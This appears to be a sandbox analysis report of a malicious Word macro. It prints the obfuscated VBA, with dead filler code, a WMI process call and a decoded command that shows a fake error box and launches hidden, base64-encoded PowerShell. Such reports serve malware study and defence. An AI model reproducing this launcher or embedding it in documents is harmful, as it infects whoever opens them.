Part of subcall function C0d4mc619_eaiuirzl@Dwztpwkmgv8q9o28r: Open
Part of subcall function C0d4mc619_eaiuirzl@Dwztpwkmgv8q9o28r: Open
Part of subcall function C0d4mc619_eaiuirzl@Dwztpwkmgv8q9o28r: Open
Part of subcall function C0d4mc619_eaiuirzl@Dwztpwkmgv8q9o28r: Open
Part of subcall function C0d4mc619_eaiuirzl@Dwztpwkmgv8q9o28r: Open
Part of subcall function C0d4mc619_eaiuirzl@Dwztpwkmgv8q9o28r: Open
Part of subcall function C0d4mc619_eaiuirzl@Dwztpwkmgv8q9o28r: Open
Part of subcall function C0d4mc619_eaiuirzl@Dwztpwkmgv8q9o28r: Open
Part of subcall function C0d4mc619_eaiuirzl@Dwztpwkmgv8q9o28r: Open
Gge416y0ol9ajq
Z2vzndsnblr9xje7s
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open

Strings	Decrypted Strings
"DbnKMvMAH.jHcdBADv.EGxUCAADs"
"gQEGCB.HVmcrDI.zGpVIUABC"
"shyujG.RFwdH.VPRoIX"
"vATeCIgJI.FpiaIJIiJ.MmplJ"
"MOIhAmCn.UAJXCE.BwsiJS"
"NpVFCB.MCDxG.UpDmKPxpp"
"xaihM.LJwjAQQQZ.DJoqHIrg"
"HvKRFHh.hsVhH.bZBNF"
"XqxxqFG.ulGKCnC.YQRUOJ"
"qq)(""s2)(pq""q)(s2)("
"qq)(s""2)(roqq"")(s2)(qq)(s2)(ceqq)(s2)""(sqq)(s2)(sqq)(s2)(qq)(s2)("
"JvOnPcH.fUHBCGVtD.MqiHAD"
"buFGCCXJ.QSbaYn.wJSsDBFER"
"PBmiWVMA.fEuTBGH.ZgHREKHJC"
"QlyBbpIG.CHPUEZ.BAQVDHmJ"
"CaxOH.vXPgFHoe.agirIF"
"yzpwxsD.ucWxvGt.QXFsbDn"
"exIqDH.MwmVE.YEfbFIJ"
"wMlGriIC.YqLZwG.IfqJAT"
"qSgyRp.VhQHDEA.ggPyFQd"
"qq)(s2)("":wqq)(s2)(qq)(s""2)(inqq)(s2)(3qq)(s""2)(2qq)(s2)(_qq)(s2)("
"ZRfmBGEw.yZYjFMHP.ckDWe"
"gbBrhF.kCOlJnAJ.GLIdD"
"MBUUAw.NbPECAix.UyuHH"
"LwmxHCmp.NFrlTBA.VFGtT"
"ofEFEBH.KSyFFWK.TKfABI"
"gyhfb.ipvwBrE.vVquOxU"
"RkYwxnJEW.rgdTkJfGF.zantCJ"
"yxpQHDBA.zkorIAiHS.StjAKJ"
"nbYwYEWhC.CeOFDlC.VvhoEHt"
"wqq)(s2"")(inqq)(s2)(mqq)(s""2)(gmqq)(s2)(tqq)(""s2)(qq)(s2)("
"WanlBnGn.vOkxHB.FUNtGuCCw"
"krLiFHpF.eVBFvd.JWHZCso"
"umSoGWOGJ.uhkWJDAQ.ACsLFB"
"rRdnUjHbw.iDplGAz.PjQxp"
"TXrkTGK.FbNkBCE.nGfkHCJj"
"fnehJF.MwLyDGIC.meixAlF"
"nXywAI.gJpfbBO.HipQCDYJJ"
"SZqPCAC.pZyeTtAF.ORiEHGH"
"OrYPhm.tEuCH.YaWnFsI"
"CRkMC.mCwoR.dFnkA"
"jrtAEKE.uIVzu.jqMwAC"
"HJmgHkBC.MyfFGEi.rTJlw"
"YeMqlJ.uCiqCNS.WjgigV"
"DrttFCz.lpfOt.UeCjC"
"AscqIIYrJ.JeGiiSE.mYjmAABJ"
"iVnKJ.YEevQ.GWucCAFI"
"NxgIP.TARFAADew.NyFRA"
"NvrZDA.DdShRHFtD.BErohw"
"lHZGGIbGc.iaJoCAFB.VNeICCIax"
"RdpGJIBOF.swjFv.IeAbvID"
"IyaYxC.BTSLmDJ.jgOiOIDGT"
"FOxJQVBLi.dDrmJG.osuuaBIDb"
"gWUYvHr.ZTgQT.DNujcI"
"BwDJADFsC.LJFNLbb.daiRJD"
"xINyH.PTxmCYVEI.ZjICHD"
"ywqUjrAcG.nStXYBIsJ.CUmPFEHE"
"gThcAJ.ZKJdpcm.tjPbu"
"sNdvIH.EwGNvsEC.ALrzVIC"
"sClXGS.DwVOXN.VhyWJEJ"
"UtEKe.Ylfjhi.utxEPXwo"
"QsQGaIC.AwxeAW.xtrtFCFdF"
"TxVEJ.iXjAEimg.TDSdLDOA"
"ThIgAFZBB.NbVEqpw.YsHvp"
"rxhFoG.AShLFJDl.zybsiV"
"UDZsNIDG.VfdgH.MBiBLq"
"MAIbDAaJ.BfRJzI.vKbPTLCD"
"IJzlC.SoCtG.TPbXhBKrm"
"GAzJGdUeC.SjRAxF.SebwGKPCv"
"BCyTAdFeI.MvwOCAI.YKhJFAApg"
"AQlXBCb.vtUJfcFG.uXigEO"
"ZDHjAEWl.doArj.lPBxKCC"
"aGQoDDk.VZsZQhDoP.fnRuG"
"gMgqJJ.sEwvhb.SuXWmVIA"
"nrzOZDa.ZzIiFFSE.VjWVF"
"vPEJJqH.jFzYA.AlzwaDJBw"
"cURDDF.pLPgGlcD.FYnPCELJI"
"HvCbXDBq.RUZaGEzC.bgBsAAd"
"vBsfDkB.xlZBIMF.TDVEEFQJ"
"DMNSECHJb.bbxJxAEDq.LnJxA"
"gFPXD.IEgaqJz.YAHsC"
"lEilB.QvPXD.cMfWCJO"
"nfhAABBEB.VeDeFP.sKzKuBBC"
"wXXiJHf.TCBShGYr.DNKsHT"
"mQnnE.bmZQGSEA.AGkxGzCHX"
"qyXGFD.Mnoog.UnkFG"
"HKwtB.rBrtHJf.lLgDD"
"AhHYjIBs.vNObEAAJ.IRARxrx"
"sLYJBI.TQZluJA.LgcFP"
"ojxyHHEP.vXfQD.OBTMB"
"AlRZo.MXGVMDVDJ.FRGRQ"
"aKrxWJUr.NfKHtA.lWiIG"
"byAGVzBQ.OjVafcB.yoXPx"
"fSJtFAEEA.yqTyACLA.PWwsTDwIy"
"YeeTCIHp.dBrFLg.qZpkDJ"
"ghtMtA.YUxUI.QTlVpGJg"
"jevGKBz.ZpfmEFvDM.fkIcAGBII"
"qDBKOE.hcDCJ.BVRxGIBBJ"
"ENMCE.LcqmMLm.kcwYHCV"
"UaWqrCaA.UYSnZCG.urBVH"
"ohhFBJjA.uWdjpFFGk.FVdrHAB"
"OEqrJ.wqhoDAHQ.xAflFS"
"YWibCdgEJ.NDhrE.WdBFBFE"
"ajyVJ.ohKLAGtFI.fshBTGEF"
"imfriCGFb.tYNKga.WYPiZwEHH"
"KuhBGApcv.ojBZUIIEX.HJefxELF"
"aRotQ.FHGaEABuI.JNHZBdF"
"uMBDk.VxvrDae.NYTTAIAe"
"VWYJvN.lGHiEC.AlsbD"
"rFDaOyDH.hZniGGDBp.fHUVY"
"KrSuJCFF.aeIBC.hRLXIc"
"PuNKnKt.sBhbCCuE.ikMJIZFm"

Line	Instruction	Meta Information
55	Function Tujor4m47ob()
56	On Error Resume Next	executed
57	sh2v = T6dwlv_ivpoiq2.StoryRanges.Item(1)	Item
58	Goto aektCnFI
59	Dim jaJUkAFeG as String
60	Open "DbnKMvMAH.jHcdBADv.EGxUCAADs" For Binary As 201	Open
61	Open "gQEGCB.HVmcrDI.zGpVIUABC" For Binary As 201	Open
62	Open "shyujG.RFwdH.VPRoIX" For Binary As 201	Open
63	Put # 201, , jaJUkAFeG
64	Close # 201
64	aektCnFI:
66	Goto RtfzGtt
67	Dim WWCACxG as String
68	Open "vATeCIgJI.FpiaIJIiJ.MmplJ" For Binary As 153	Open
69	Open "MOIhAmCn.UAJXCE.BwsiJS" For Binary As 153	Open
70	Open "NpVFCB.MCDxG.UpDmKPxpp" For Binary As 153	Open
71	Put # 153, , WWCACxG
72	Close # 153
72	RtfzGtt:
74	Goto QSISC
75	Dim qVbhwsATQ as String
76	Open "xaihM.LJwjAQQQZ.DJoqHIrg" For Binary As 188	Open
77	Open "HvKRFHh.hsVhH.bZBNF" For Binary As 188	Open
78	Open "XqxxqFG.ulGKCnC.YQRUOJ" For Binary As 188	Open
79	Put # 188, , qVbhwsATQ
80	Close # 188
80	QSISC:
82	sng2 = "qq)(" + "s2)(pq" + "q)(s2)("
84	F7_if4svnte = "qq)(s" + "2)(roqq" + ")(s2)(qq)(s2)(ceqq)(s2)" + "(sqq)(s2)(sqq)(s2)(qq)(s2)("
87	Goto nelsfX
88	Dim MURoCFiFB as String
89	Open "JvOnPcH.fUHBCGVtD.MqiHAD" For Binary As 133	Open
90	Open "buFGCCXJ.QSbaYn.wJSsDBFER" For Binary As 133	Open
91	Open "PBmiWVMA.fEuTBGH.ZgHREKHJC" For Binary As 133	Open
92	Put # 133, , MURoCFiFB
93	Close # 133
93	nelsfX:
95	Goto huGtwmS
96	Dim taucEJAED as String
97	Open "QlyBbpIG.CHPUEZ.BAQVDHmJ" For Binary As 59	Open
98	Open "CaxOH.vXPgFHoe.agirIF" For Binary As 59	Open
99	Open "yzpwxsD.ucWxvGt.QXFsbDn" For Binary As 59	Open
100	Put # 59, , taucEJAED
101	Close # 59
101	huGtwmS:
103	Goto DvDefEl
104	Dim TfsIR as String
105	Open "exIqDH.MwmVE.YEfbFIJ" For Binary As 176	Open
106	Open "wMlGriIC.YqLZwG.IfqJAT" For Binary As 176	Open
107	Open "qSgyRp.VhQHDEA.ggPyFQd" For Binary As 176	Open
108	Put # 176, , TfsIR
109	Close # 176
109	DvDefEl:
111	Vbzhqcqh1pqco1e2_ = "qq)(s2)(" + ":wqq)(s2)(qq)(s" + "2)(inqq)(s2)(3qq)(s" + "2)(2qq)(s2)(_qq)(s2)("
114	Goto vAZQiJB
115	Dim xuHzWGDG as String
116	Open "ZRfmBGEw.yZYjFMHP.ckDWe" For Binary As 141	Open
117	Open "gbBrhF.kCOlJnAJ.GLIdD" For Binary As 141	Open
118	Open "MBUUAw.NbPECAix.UyuHH" For Binary As 141	Open
119	Put # 141, , xuHzWGDG
120	Close # 141
120	vAZQiJB:
122	Goto nmWOSYyF
123	Dim QPqDJP as String
124	Open "LwmxHCmp.NFrlTBA.VFGtT" For Binary As 149	Open
125	Open "ofEFEBH.KSyFFWK.TKfABI" For Binary As 149	Open
126	Open "gyhfb.ipvwBrE.vVquOxU" For Binary As 149	Open
127	Put # 149, , QPqDJP
128	Close # 149
128	nmWOSYyF:
130	Goto tWXiIJDnz
131	Dim PJjuJ as String
132	Open "RkYwxnJEW.rgdTkJfGF.zantCJ" For Binary As 152	Open
133	Open "yxpQHDBA.zkorIAiHS.StjAKJ" For Binary As 152	Open
134	Open "nbYwYEWhC.CeOFDlC.VvhoEHt" For Binary As 152	Open
135	Put # 152, , PJjuJ
136	Close # 152
136	tWXiIJDnz:
138	R67uawfvzvw = "wqq)(s2" + ")(inqq)(s2)(mqq)(s" + "2)(gmqq)(s2)(tqq)(" + "s2)(qq)(s2)("
140	Goto SyZjrEHAG
141	Dim UjcXr as String
142	Open "WanlBnGn.vOkxHB.FUNtGuCCw" For Binary As 52	Open
143	Open "krLiFHpF.eVBFvd.JWHZCso" For Binary As 52	Open
144	Open "umSoGWOGJ.uhkWJDAQ.ACsLFB" For Binary As 52	Open
145	Put # 52, , UjcXr
146	Close # 52
146	SyZjrEHAG:
148	Goto uXAHJydE
149	Dim HpQEA as String
150	Open "rRdnUjHbw.iDplGAz.PjQxp" For Binary As 211	Open
151	Open "TXrkTGK.FbNkBCE.nGfkHCJj" For Binary As 211	Open
152	Open "fnehJF.MwLyDGIC.meixAlF" For Binary As 211	Open
153	Put # 211, , HpQEA
154	Close # 211
154	uXAHJydE:
156	Goto PYuemWAC
157	Dim DiIIF as String
158	Open "nXywAI.gJpfbBO.HipQCDYJJ" For Binary As 129	Open
159	Open "SZqPCAC.pZyeTtAF.ORiEHGH" For Binary As 129	Open
160	Open "OrYPhm.tEuCH.YaWnFsI" For Binary As 129	Open
161	Put # 129, , DiIIF
162	Close # 129
162	PYuemWAC:
164	Kz1yuitvz3qu6xai = Kfo_8qx2w7l7x71 + ChrW(Hvsf68urunanusc + wdKeyS + A08llnuiz59xyw7) + Pgjdd1yrw8qt	Kfo_8qx2w7l7x71 ChrW Hvsf68urunanusc wdKeyS A08llnuiz59xyw7 Pgjdd1yrw8qt
165	Goto UxlgEAI
166	Dim rFHJy as String
167	Open "CRkMC.mCwoR.dFnkA" For Binary As 185	Open
168	Open "jrtAEKE.uIVzu.jqMwAC" For Binary As 185	Open
169	Open "HJmgHkBC.MyfFGEi.rTJlw" For Binary As 185	Open
170	Put # 185, , rFHJy
171	Close # 185
171	UxlgEAI:
173	Goto vIDVA
174	Dim GWbqA as String
175	Open "YeMqlJ.uCiqCNS.WjgigV" For Binary As 159	Open
176	Open "DrttFCz.lpfOt.UeCjC" For Binary As 159	Open
177	Open "AscqIIYrJ.JeGiiSE.mYjmAABJ" For Binary As 159	Open
178	Put # 159, , GWbqA
179	Close # 159
179	vIDVA:
181	Goto lutoTsPkH
182	Dim nmwGcQ as String
183	Open "iVnKJ.YEevQ.GWucCAFI" For Binary As 217	Open
184	Open "NxgIP.TARFAADew.NyFRA" For Binary As 217	Open
185	Open "NvrZDA.DdShRHFtD.BErohw" For Binary As 217	Open
186	Put # 217, , nmwGcQ
187	Close # 217
187	lutoTsPkH:
189	Ni1wsg2ja20x23qpzl = R67uawfvzvw + Kz1yuitvz3qu6xai + Vbzhqcqh1pqco1e2_ + sng2 + F7_if4svnte
190	Goto QdQmIDzTC
191	Dim akWgAQAIC as String
192	Open "lHZGGIbGc.iaJoCAFB.VNeICCIax" For Binary As 206	Open
193	Open "RdpGJIBOF.swjFv.IeAbvID" For Binary As 206	Open
194	Open "IyaYxC.BTSLmDJ.jgOiOIDGT" For Binary As 206	Open
195	Put # 206, , akWgAQAIC
196	Close # 206
196	QdQmIDzTC:
198	Goto zNPNECkYX
199	Dim JZcLuFA as String
200	Open "FOxJQVBLi.dDrmJG.osuuaBIDb" For Binary As 125	Open
201	Open "gWUYvHr.ZTgQT.DNujcI" For Binary As 125	Open
202	Open "BwDJADFsC.LJFNLbb.daiRJD" For Binary As 125	Open
203	Put # 125, , JZcLuFA
204	Close # 125
204	zNPNECkYX:
206	Goto vmJnC
207	Dim OahWDBD as String
208	Open "xINyH.PTxmCYVEI.ZjICHD" For Binary As 167	Open
209	Open "ywqUjrAcG.nStXYBIsJ.CUmPFEHE" For Binary As 167	Open
210	Open "gThcAJ.ZKJdpcm.tjPbu" For Binary As 167	Open
211	Put # 167, , OahWDBD
212	Close # 167
212	vmJnC:
214	Kltqgnwd4i8 = C0d4mc619_eaiuirzl(Ni1wsg2ja20x23qpzl)
215	Goto sFyhnDDx
216	Dim PCRIYp as String
217	Open "sNdvIH.EwGNvsEC.ALrzVIC" For Binary As 203	Open
218	Open "sClXGS.DwVOXN.VhyWJEJ" For Binary As 203	Open
219	Open "UtEKe.Ylfjhi.utxEPXwo" For Binary As 203	Open
220	Put # 203, , PCRIYp
221	Close # 203
221	sFyhnDDx:
223	Goto RKPFYlFb
224	Dim pRdXtubFT as String
225	Open "QsQGaIC.AwxeAW.xtrtFCFdF" For Binary As 158	Open
226	Open "TxVEJ.iXjAEimg.TDSdLDOA" For Binary As 158	Open
227	Open "ThIgAFZBB.NbVEqpw.YsHvp" For Binary As 158	Open
228	Put # 158, , pRdXtubFT
229	Close # 158
229	RKPFYlFb:
231	Goto vmlpJOA
232	Dim HUPVnvFAA as String
233	Open "rxhFoG.AShLFJDl.zybsiV" For Binary As 191	Open
234	Open "UDZsNIDG.VfdgH.MBiBLq" For Binary As 191	Open
235	Open "MAIbDAaJ.BfRJzI.vKbPTLCD" For Binary As 191	Open
236	Put # 191, , HUPVnvFAA
237	Close # 191
237	vmlpJOA:
239	Set Bx9ystsny9ej4ynfne = CreateObject(Kltqgnwd4i8)	CreateObject("winmgmtS:win32_process") executed
240	Goto PViTAAED
241	Dim KMChE as String
242	Open "IJzlC.SoCtG.TPbXhBKrm" For Binary As 94	Open
243	Open "GAzJGdUeC.SjRAxF.SebwGKPCv" For Binary As 94	Open
244	Open "BCyTAdFeI.MvwOCAI.YKhJFAApg" For Binary As 94	Open
245	Put # 94, , KMChE
246	Close # 94
246	PViTAAED:
248	Goto RBFRbHBg
249	Dim DqWYFGG as String
250	Open "AQlXBCb.vtUJfcFG.uXigEO" For Binary As 214	Open
251	Open "ZDHjAEWl.doArj.lPBxKCC" For Binary As 214	Open
252	Open "aGQoDDk.VZsZQhDoP.fnRuG" For Binary As 214	Open
253	Put # 214, , DqWYFGG
254	Close # 214
254	RBFRbHBg:
256	Goto SFgGtIlpD
257	Dim GDZZqGDJ as String
258	Open "gMgqJJ.sEwvhb.SuXWmVIA" For Binary As 106	Open
259	Open "nrzOZDa.ZzIiFFSE.VjWVF" For Binary As 106	Open
260	Open "vPEJJqH.jFzYA.AlzwaDJBw" For Binary As 106	Open
261	Put # 106, , GDZZqGDJ
262	Close # 106
262	SFgGtIlpD:
264	Wb0zemdl5ow9 = Mid(sh2v, (5), Len(sh2v))	Mid Len("\x01 qq)(s2)(qq)(s2)(cqq)(s2)(mqq)(s2)(dqq)(s2)( qq)(s2)(cqq)(s2)(mqq)(s2)(dqq)(s2)( qq)(s2)(cqq)(s2)(mqq)(s2)(dqq)(s2)( qq)(s2)(cqq)(s2)(mqq)(s2)(dqq)(s2)( qq)(s2)(/qq)(s2)(cqq)(s2)( qq)(s2)(mqq)(s2)(sqq)(s2)(gqq)(s2)( qq)(s2)(%qq)(s2)(uqq)(s2)(sqq)(s2)(eqq)(s2)(rqq)(s2)(nqq)(s2)(aqq)(s2)(mqq)(s2)(eqq)(s2)(%qq)(s2)( qq)(s2)(/qq)(s2)(vqq)(s2)( qq)(s2)(Wqq)(s2)(oqq)(s2)(rqq)(s2)(dqq)(s2)( qq)(s2)(eqq)(s2)(xqq)(s2)(pqq)(s2)(eqq)(s2)(rqq)(s2)(iqq)(s2)(eqq)(s2)(nqq)(s2)(cqq)(s2)(eqq)(s2)(dqq)(s2)( qq)(s2)(aqq)(s2)(nqq)(s2)( qq)(s2)(eqq)(s2)(rqq)(s2)(rqq)(s2)(oqq)(s2)(rqq)(s2)( qq)(s2)(tqq)(s2)(rqq)(s2)(yqq)(s2)(iqq)(s2)(nqq)(s2)(gqq)(s2)( qq)(s2)(tqq)(s2)(oqq)(s2)( qq)(s2)(oqq)(s2)(pqq)(s2)(eqq)(s2)(nqq)(s2)( qq)(s2)(tqq)(s2)(hqq)(s2)(eqq)(s2)( qq)(s2)(fqq)(s2)(iqq)(s2)(lqq)(s2)(eqq)(s2)(.qq)(s2)( qq)(s2)(&qq)(s2)( qq)(s2)( qq)(s2)(Pqq)(s2)(Oqq)(s2)(wqq)(s2)(eqq)(s2)(rqq)(s2)(sqq)(s2)(hqq)(s2)(eqq)(s2)(Lqq)(s2)(Lqq)(s2)( qq)(s2)(-qq)(s2)(wqq)(s2)( qq)(s2)(hqq)(s2)(iqq)(s2)(dqq)(s2)(dqq)(s2)(eqq)(s2)(nqq)(s2)( qq)(s2)(-qq)(s2)(Eqq)(s2)(Nqq)(s2)(Cqq)(s2)(Oqq)(s2)(Dqq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( IAqq)(s2)(Agqq)(s2)(ACqq)(s2)(QAqq)(s2)(aQqq)(s2)(Bvqq)(s2)(AHqq)(s2)(gAqq)(s2)(Swqq)(s2)(B5qq)(s2)(ADqq)(s2)(IAqq)(s2)(IAqq)(s2)(A9qq)(s2)(ACqq)(s2)(AAqq)(s2)(Wwqq)(s2)(B0qq)(s2)(AFqq)(s2)(kAqq)(s2)(UAqq)(s2)(BFqq)(s2)(AFqq)(s2)(0Aqq)(s2)(KAqq)(s2)(Aiqq)(s2)(AHqq)(s2)(sAqq)(s2)(Mgqq)(s2)(B9qq)(s2)(AHqq)(s2)(sAqq)(s2)(MAqq)(s2)(B9qq)(s2)(AHqq)(s2)(sAqq)(s2)(Mwqq)(s2)(B9qq)(s2)(AHqq)(s2)(sAqq)(s2)(MQqq)(s2)(B9qq)(s2)(ACqq)(s2)(IAqq)(s2)(LQqq)(s2)(Bmqq)(s2)(ACqq)(s2)(cAqq)(s2)(cwqq)(s2)(BUqq)(s2)(AEqq)(s2)(UAqq)(s2)(bQqq)(s2)(Auqq)(s2)(AGqq)(s2)(kAqq)(s2)(Twqq)(s2)(Auqq)(s2)(AGqq)(s2)(QAqq)(s2)(aQqq)(s2)(BSqq)(s2)(AGqq)(s2)(UAqq)(s2)(Ywqq)(s2)(BUqq)(s2)(ACqq)(s2)(cAqq)(s2)(LAqq)(s2)(Anqq)(s2)(AHqq)(s2)(kAqq)(s2)(Jwqq)(s2)(Asqq)(s2)(ACqq)(s2)(cAqq)(s2)(Uwqq)(s2)(B5qq)(s2)(ACqq)(s2)(cAqq)(s2)(LAqq)(s2)(Anqq)(s2)(AEqq)(s2)(8Aqq)(s2)(cgqq)(s2)(Anqq)(s2)(ACqq)(s2)(kAqq)(s2)(IAqq)(s2)(A7qq)(s2)(ACqq)(s2)(AAqq)(s2)(cwqq)(s2)(BFqq)(s2)(AHqq)(s2)(QAqq)(s2)(LQqq)(s2)(BJqq)(s2)(AHqq)(s2)(QAqq)(s2)(ZQqq)(s2)(BNqq)(s2)(ACqq)(s2)(AAqq)(s2)(IAqq)(s2)(B2qq)(s2)(AGqq)(s2)(EAqq)(s2)(Ugqq)(s2)(Bpqq)(s2)(AGqq)(s2)(EAqq)(s2)(Ygqq)(s2)(BMqq)(s2)(AGqq)(s2)(UAqq)(s2)(Ogqq)(s2)(Axqq)(s2)(ADqq)(s2)(YAqq)(s2)(Vgqq)(s2)(BKqq)(s2)(ACqq)(s2)(AAqq)(s2)(IAqq)(s2)(Aoqq)(s2)(AFqq)(s2)(sAqq)(s2)(dAqq)(s2)(BZqq)(s2)(AFqq)(s2)(AAqq)(s2)(ZQqq)(s2)(Bdqq)(s2)(ACqq)(s2)(gAqq)(s2)(Igqq)(s2)(B7qq)(s2)(ADqq)(s2)(YAqq)(s2)(fQqq)(s2)(B7qq)(s2)(ADqq)(s2)(cAqq)(s2)(fQqq)(s2)(B7qq)(s2)(ADqq)(s2)(MAqq)(s2)(fQqq)(s2)(B7qq)(s2)(ADqq)(s2)(UAqq)(s2)(fQqq)(s2)(B7qq)(s2)(ADqq)(s2)(AAqq)(s2)(fQqq)(s2)(B7qq)(s2)(ADqq)(s2)(IAqq)(s2)(fQqq)(s2)(B7qq)(s2)(ADqq)(s2)(QAqq)(s2)(fQqq)(s2)(B7qq)(s2)(ADqq)(s2)(EAqq)(s2)(fQqq)(s2)(Aiqq)(s2)(ACqq)(s2)(AAqq)(s2)(LQqq)(s2)(BGqq)(s2)(ACqq)(s2)(cAqq)(s2)(Vgqq)(s2)(Anqq)(s2)(ACqq)(s2)(wAqq)(s2)(Jwqq)(s2)(Byqq)(s2)(ACqq)(s2)(cAqq)(s2)(LAqq)(s2)(Anqq)(s2)(AEqq)(s2)(kAqq)(s2)(Ywqq)(s2)(BFqq)(s2)(AFqq)(s2)(AAqq)(s2)(bwqq)(s2)(Bpqq)(s2)(AEqq)(s2)(4Aqq)(s2)(Jwqq)(s2)(Asqq)(s2)(ACqq)(s2)(cAqq)(s2)(Tgqq)(s2)(Blqq)(s2)(AFqq)(s2)(QAqq)(s2)(Lgqq)(s2)(BTqq)(s2)(ACqq)(s2)(cAqq)(s2)(LAqq)(s2)(Anqq)(s2)(AFqq)(s2)(QAqq)(s2)(bQqq)(s2)(Bhqq)(s2)(AEqq)(s2)(4Aqq)(s2)(YQqq)(s2)(BHqq)(s2)(AEqq)(s2)(UAqq)(s2)(Jwqq)(s2)(Asqq)(s2)(ACqq)(s2)(cAqq)(s2)(ZQqq)(s2)(BSqq)(s2)(ACqq)(s2)(cAqq)(s2)(LAqq)(s2)(Anqq)(s2)(AHqq)(s2)(MAqq)(s2)(WQqq)(s2)(BTqq)(s2)(ACqq)(s2)(cAqq)(s2)(LAqq)(s2)(Anqq)(s2)(AHqq)(s2)(QAqq)(s2)(ZQqq)(s2)(Btqq)(s2)(ACqq)(s2)(4Aqq)(s2)(Jwqq)(s2)(Apqq)(s2)(ACqq)(s2)(AAqq)(s2)(KQqq)(s2)(A7qq)(s2)(ACqq)(s2)(QAqq)(s2)(Swqq)(s2)(B0qq)(s2)(ADqq)(s2)(MAqq)(s2)(cwqq)(s2)(Biqq)(s2)(AGqq)(s2)(8Aqq)(s2)(Zwqq)(s2)(A9qq)(s2)(ACqq)(s2)(gAqq)(s2)(Jwqq)(s2)(BCqq)(s2)(ACqq)(s2)(cAqq)(s2)(Kwqq)(s2)(Aoqq)(s2)(ACqq)(s2)(cAqq)(s2)(bQqq)(s2)(Anqq)(s2)(ACqq)(s2)(sAqq)(s2)(Jwqq)(s2)(B2qq)(s2)(ACqq)(s2)(cAqq)(s2)(Kwqq)(s2)(Anqq)(s2)(AGqq)(s2)(sAqq)(s2)(awqq)(s2)(A5qq)(s2)(AHqq)(s2) -> 39020 executed
265	Goto xjadBeU
266	Dim nmTHypHA as String
267	Open "cURDDF.pLPgGlcD.FYnPCELJI" For Binary As 127	Open
268	Open "HvCbXDBq.RUZaGEzC.bgBsAAd" For Binary As 127	Open
269	Open "vBsfDkB.xlZBIMF.TDVEEFQJ" For Binary As 127	Open
270	Put # 127, , nmTHypHA
271	Close # 127
271	xjadBeU:
273	Goto wWUQDA
274	Dim AEazvYO as String
275	Open "DMNSECHJb.bbxJxAEDq.LnJxA" For Binary As 55	Open
276	Open "gFPXD.IEgaqJz.YAHsC" For Binary As 55	Open
277	Open "lEilB.QvPXD.cMfWCJO" For Binary As 55	Open
278	Put # 55, , AEazvYO
279	Close # 55
279	wWUQDA:
281	Goto xFoIFC
282	Dim YFLpuEi as String
283	Open "nfhAABBEB.VeDeFP.sKzKuBBC" For Binary As 203	Open
284	Open "wXXiJHf.TCBShGYr.DNKsHT" For Binary As 203	Open
285	Open "mQnnE.bmZQGSEA.AGkxGzCHX" For Binary As 203	Open
286	Put # 203, , YFLpuEi
287	Close # 203
287	xFoIFC:
289	Goto QGPRjInP
290	Dim WKiiJDVJq as String
291	Open "qyXGFD.Mnoog.UnkFG" For Binary As 109	Open
292	Open "HKwtB.rBrtHJf.lLgDD" For Binary As 109	Open
293	Open "AhHYjIBs.vNObEAAJ.IRARxrx" For Binary As 109	Open
294	Put # 109, , WKiiJDVJq
295	Close # 109
295	QGPRjInP:
297	Goto AsvyFHHC
298	Dim FymJHI as String
299	Open "sLYJBI.TQZluJA.LgcFP" For Binary As 175	Open
300	Open "ojxyHHEP.vXfQD.OBTMB" For Binary As 175	Open
301	Open "AlRZo.MXGVMDVDJ.FRGRQ" For Binary As 175	Open
302	Put # 175, , FymJHI
303	Close # 175
303	AsvyFHHC:
305	Goto iKyOGBLAy
306	Dim zqgnJAxpy as String
307	Open "aKrxWJUr.NfKHtA.lWiIG" For Binary As 150	Open
308	Open "byAGVzBQ.OjVafcB.yoXPx" For Binary As 150	Open
309	Open "fSJtFAEEA.yqTyACLA.PWwsTDwIy" For Binary As 150	Open
310	Put # 150, , zqgnJAxpy
311	Close # 150
311	iKyOGBLAy:
313	Bx9ystsny9ej4ynfne.Create C0d4mc619_eaiuirzl(Wb0zemdl5ow9), Gge416y0ol9ajq, Z2vzndsnblr9xje7s	SWbemObjectEx.Create("cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAgACQAaQBvAHgASwB5ADIAIAA9ACAAWwB0AFkAUABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIALQBmACcAcwBUAEUAbQAuAGkATwAuAGQAaQBSAGUAYwBUACcALAAnAHkAJwAsACcAUwB5ACcALAAnAE8AcgAnACkAIAA7ACAAcwBFAHQALQBJAHQAZQBNACAAIAB2AGEAUgBpAGEAYgBMAGUAOgAxADYAVgBKACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADYAfQB7ADcAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACcAVgAnACwAJwByACcALAAnAEkAYwBFAFAAbwBpAE4AJwAsACcATgBlAFQALgBTACcALAAnAFQAbQBhAE4AYQBHAEUAJwAsACcAZQBSACcALAAnAHMAWQBTACcALAAnAHQAZQBtAC4AJwApACAAKQA7ACQASwB0ADMAcwBiAG8AZwA9ACgAJwBCACcAKwAoACcAbQAnACsAJwB2ACcAKwAnAGsAawA5AHIAJwApACkAOwAkAE0AagA1AG4AcAB3AF8APQAkAFoAOQBsAHMANAB6ADYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEcAMwA1AHcANQAyADQAOwAkAFkAZAAwADgANQByAHgAPQAoACcAVQB4ACcAKwAoACcAZQBlACcAKwAnAF8AJwApACsAJwB3AGwAJwApADsAIAAgACgAIAAgAGcARQB0AC0AaQB0AEUATQAgACgAJwB2AGEAUgBJACcAKwAnAEEAYgBsAEUAJwArACcAOgAnACsAJwBJAG8AWABLAFkAMgAnACkAIAApAC4AVgBBAGwAdQBlADoAOgAiAEMAYABSAEUAYABBAFQAYABlAGAAZABJAFIARQBjAHQATwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEkARQAnACsAJwBjACcAKQArACcATwAnACsAKAAnAF8AJwArACcAdwBnAHEAJwApACsAJwB2ACcAKwAoACcANwAnACsAJwBJAEUAYwBDADAAMwAxACcAKQArACgAJwA2AGUAbQBJAEUAJwArACcAYwAnACkAKQAgAC0AYwByAEUAcABsAEEAYwBFACAAIAAoACcASQBFACcAKwAn